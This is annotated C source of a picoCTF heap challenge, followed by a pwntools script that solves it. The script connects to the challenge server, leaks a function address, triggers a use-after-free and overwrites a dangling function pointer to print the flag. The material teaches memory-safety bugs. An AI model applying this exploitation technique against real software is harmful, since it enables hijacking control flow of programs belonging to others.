/*
 * Command record that the menu loop dispatches through.
 *
 * whatToDo is the handler that doProcess() calls; username is a plain char
 * pointer that no code shown on this page reads. The object is heap-allocated,
 * so the call target sits in heap memory beside ordinary data: whoever can
 * write to this storage, or to a later allocation that reuses it, decides
 * where the program jumps.
 */
typedef struct {
    uintptr_t (*whatToDo)();   /* handler invoked by doProcess() */
    char *username;            /* unused in the code shown here */
} cmd;
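/*
 * Allocate the global command object.
 *
 * sizeof *user is the size of the cmd struct. sizeof(user) is only the size
 * of the pointer, which is smaller than the two-pointer struct the block has
 * to hold. The result still has to be checked for NULL by the surrounding
 * code before it is dereferenced.
 */
user = malloc(sizeof *user);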
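/*
 * Handler for leaving: asks for confirmation and, on 'Y' or 'y', frees the
 * global user object.
 *
 * NOTE(security): free(user) releases the object but leaves the global
 * pointer holding the old address. main() keeps calling doProcess(user) on
 * every loop iteration, so a later dispatch reads its function pointer out of
 * freed memory (use-after-free). The remedy has two halves that belong
 * together: set user = NULL here, and make the dispatcher skip a NULL user.
 * Clearing the pointer alone would only turn the stale call into a NULL
 * dereference.
 */
void i(){
    /* Start from "no" so the test below never reads an uninitialised value. */
    char response = 'N';

    puts("You're leaving already(Y/N)?");
    if (scanf(" %c", &response) != 1) {
        response = 'N';   /* EOF or read error: treat as "stay" */
    }

    /* toupper() needs a value representable as unsigned char. */
    if (toupper((unsigned char)response) == 'Y') {
        puts("Bye!");
        free(user);       /* bug site marked by the writeup: user now dangles */
    } else {
        puts("Ok. Get premium membership please!");
    }
}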
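/*
 * Invoke the handler stored in obj->whatToDo.
 *
 * The call target is read from the object at call time, so the object must
 * still be alive when this runs. The NULL checks below reject a missing
 * object or an unset handler; they cannot detect a pointer to memory that has
 * already been freed, so callers must clear their pointer when they free it.
 */
void doProcess(cmd* obj) {
    if (obj == NULL || obj->whatToDo == NULL) {
        return;
    }
    (*obj->whatToDo)();   /* indirect call through the stored pointer */
}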
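/*
 * Entry point: unbuffer stdout, allocate the global user object, then loop
 * forever printing the menu, reading a command and dispatching it.
 */
int main(){
    setbuf(stdout, NULL);

    /* sizeof *user is the struct; sizeof(user) would be one pointer only. */
    user = malloc(sizeof *user);
    if (user == NULL) {
        perror("malloc");
        return 1;
    }

    while(1){
        printMenu();
        processInput();
        /*
         * NOTE(security): this dispatch runs on every iteration, including
         * iterations after i() has freed user. The original source has an
         * `if(user)` guard commented out around this call. Restoring it only
         * helps if i() also sets user = NULL after free(), because a freed
         * pointer is still non-NULL.
         */
        doProcess(user);
    }
    return 0;
}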
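/*
 * Read the first line of flag.txt (at most FLAG_BUFFER - 1 characters) and
 * print it to stdout.
 *
 * In the code shown on this page nothing calls this function by name; s()
 * only prints its address. It is reachable solely through an indirect call.
 */
void hahaexploitgobrrr(){
    char buf[FLAG_BUFFER];
    FILE *f = fopen("flag.txt","r");

    /* A missing or unreadable file must not reach fgets() as a NULL stream. */
    if (f == NULL) {
        perror("flag.txt");
        return;
    }

    /* buf holds valid data only when fgets() succeeds. */
    if (fgets(buf, FLAG_BUFFER, f) != NULL) {
        fprintf(stdout, "%s\n", buf);
    }
    fflush(stdout);

    fclose(f);   /* the original never closed the stream */
}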
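/*
 * Prints the run-time address of hahaexploitgobrrr() followed by a thank-you
 * banner.
 *
 * NOTE(security): the first line hands a code address to whoever is on the
 * other end of stdout. Disclosing pointers to an untrusted peer removes the
 * protection that address randomisation would otherwise provide, so
 * production code should never echo them.
 */
void s(){
    /* %p expects a void *; convert the function pointer explicitly. */
    printf("OOP! Memory leak...%p\n", (void *)hahaexploitgobrrr);
    puts("Thanks for subsribing! I really recommend becoming a premium member!");
}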
/*
 * Print a two-line prompt, then read up to 8 raw bytes from file descriptor 0
 * into a freshly allocated 8-byte heap buffer.
 *
 * NOTE(review): the buffer is never used or freed afterwards, the bytes are
 * not NUL-terminated, and neither malloc() nor read() is checked. The caller
 * controls every byte stored here. Any stale pointer into a block that the
 * allocator reuses for this request will therefore see caller-chosen data,
 * which is presumably why the writeup pairs this handler with the free() in
 * i().
 */
void leaveMessage(){
    enum { MSG_BYTES = 8 };
    char *msg;

    puts("I only read premium member messages but you can ");
    puts("try anyways:");

    msg = malloc(MSG_BYTES);
    read(0, msg, MSG_BYTES);
}
#!/usr/bin/env python3 #-- all rights: @fey --# #-- py-version: 3.* --# from pwn import * import struct as st #SET UP proc = process(["nc", "mercury.picoctf.net", "50361"]) #Leak vuln addr print("[+] Leaking vuln function's address") resp = proc.recvuntil("xit") proc.sendline("s") resp = proc.recvuntil("xit") leak_addr = resp.split(b"\n")[1].split(b"...")[1] int_leak_addr = int(leak_addr,16) print("[*] Vuln function addr:", leak_addr, "->", int_leak_addr, "-->", hex(int_leak_addr)) #Delete User print("[+] Deleting user struct") proc.sendline("i") proc.recvuntil("?") proc.sendline("Y") resp = proc.recvuntil("xit") print("[*] User is now free") #Update User's function value print("[+] Updating value for user function, with vuln function") proc.sendline("l") resp = proc.recvuntil(":\n") proc.sendline(st.pack("I", int_leak_addr)) print("[*] Value updated") #GET FLAG print("[+] Get flag") resp = proc.recv().split(b"\n")[0] resp = str(resp)[2:-1] print("[!] Here is the flag:", resp)